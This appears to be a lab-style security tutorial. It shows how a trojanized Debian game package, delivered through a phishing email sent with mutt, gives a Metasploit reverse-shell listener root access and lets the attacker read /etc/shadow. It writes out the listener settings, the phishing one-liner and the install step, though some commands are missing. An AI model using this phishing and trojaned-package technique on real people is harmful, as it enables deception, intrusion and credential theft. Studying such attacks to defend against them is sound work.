In the Spear Phishing post HERE we saw how a malicious file can be delivered to a system by tricking a user into downloading and running a malicious executable. In this post, we will see how a malicious Debian package, when opened and installed on a target system, can provide an attacker with remote access to the system. So, let's see how we can do client-side exploitation step by step:
Step 1: Starting Metasploit Framework
First, we need to set up a listener that will wait for incoming connections. Launch the Metasploit Framework by entering the following command:
Step 2: Selecting Module
For this post we will use Generic Payload Handler, which provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework. Select the module by entering the following command:
Step 3: Configuring Listener
Now let's configure the module to listen on the TCP port 4444 on our localhost IP and select the shell/reverse_tcp payload:
set LHOST 127.0.0.1
set LPORT 4444
set PAYLOAD linux/x86/shell/reverse_tcp
Step 4: Starting Listener
Now start the listener by entering exploit.
Now create a new tab by command Ctrl + Shift + T and switch to a new tab.
Step 5: Sending Phishing Email
For this attack we will send a download link rather than an attachment. The following command will send an invitation to download a game from a website:
echo "Check out this cool game! Download from <a href="http://skillsetlocal.com/moon-buggy.deb">here</a> for FREE." | mutt -e "set content_type=text/html" -s "Game Download" -- firstname.lastname@example.org
Step 6: Checking Email
We will use mutt again to read the email:
Step 7: Reading Email
You should see our email in the inbox. Hit Enter to open it.
Next, hit v to view the attachment (which, in this case, is just the body of the email). Hit Enter to open it.
You should see our phishing email message with the download link highlighted in yellow.
Step 8: Downloading File
Hit Enter to follow the link, then hit d to download.
Next, use the down arrow key to select Save to disk and hit Enter.
Hit Enter again to accept the default filename.
Step 9: Installing Package
Exit mutt by hitting q, i, and q again (or press** Ctrl+C** and then Enter to confirm). Now let's install the downloaded package with the following command:
sudo dpkg -i moon-buggy.deb
Do you see anything unusual? No. The package is installing as normal, without any red flags being raised. Now let's return to our listener.
Again switch to tab 1.
Step 10: Using Reverse Shell
Let's see what kind of access we got. Enter the following command to get the user ID:
We are running as root! To confirm, let's read the /etc/shadow file:
Game over. Now again switch tabs.
Step 11: Playing Game
All quiet here. The admin user can enjoy the "cool free game" while the attacker is enjoying the root access to the system.
Enter moon-buggy to play the game. You can see that the package is fully functional, with a Trojan added as a "bonus feature".
Also read: Spearphishing